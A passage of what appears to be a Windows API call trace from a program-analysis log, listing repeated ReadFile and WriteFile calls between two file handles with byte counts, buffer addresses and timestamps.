lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x18, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.728] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.728] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3e2, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.729] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.729] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2b3, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.730] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.730] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x239, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.731] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.731] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x27d, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.732] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.732] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2bf, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.733] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.733] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2bc, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.734] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.734] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x282, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.735] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.735] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2c8, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.735] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.736] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x398, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.737] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.737] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x30e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.737] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.738] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x297, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.738] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.739] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x370, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.739] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.740] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2c3, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.740] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.741] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x354, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.741] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.742] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3c3, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.742] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.743] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x39c, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.743] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.744] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3ce, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.744] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.745] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3f9, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.745] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.746] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.777] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0xae, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.778] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.778] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x295, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.779] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.779] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x25d, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.780] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.780] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x290, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.781] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.781] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2be, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.782] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.782] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x24d, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.783] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.783] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2a2, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.784] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.784] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2e0, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.785] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.785] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2f7, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.786] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.786] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x31e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.787] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.787] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2af, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.788] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.788] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x25d, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.789] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.789] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x23a, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.790] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.790] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2a4, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.791] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.791] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x339, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.792] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.792] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2c7, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.793] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.793] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2ba, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.794] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.794] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x26b, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.795] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.795] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x25c, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.796] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.796] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2bd, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.797] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.797] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x294, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.797] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.798] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2b0, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.798] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.799] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x286, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.800] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.800] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2c1, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.801] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.801] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2ae, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.802] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.802] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x347, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.803] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.803] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2c9, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.804] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.804] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2df, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.805] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.805] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x302, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.806] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.806] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2cc, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.807] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.807] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2c7, 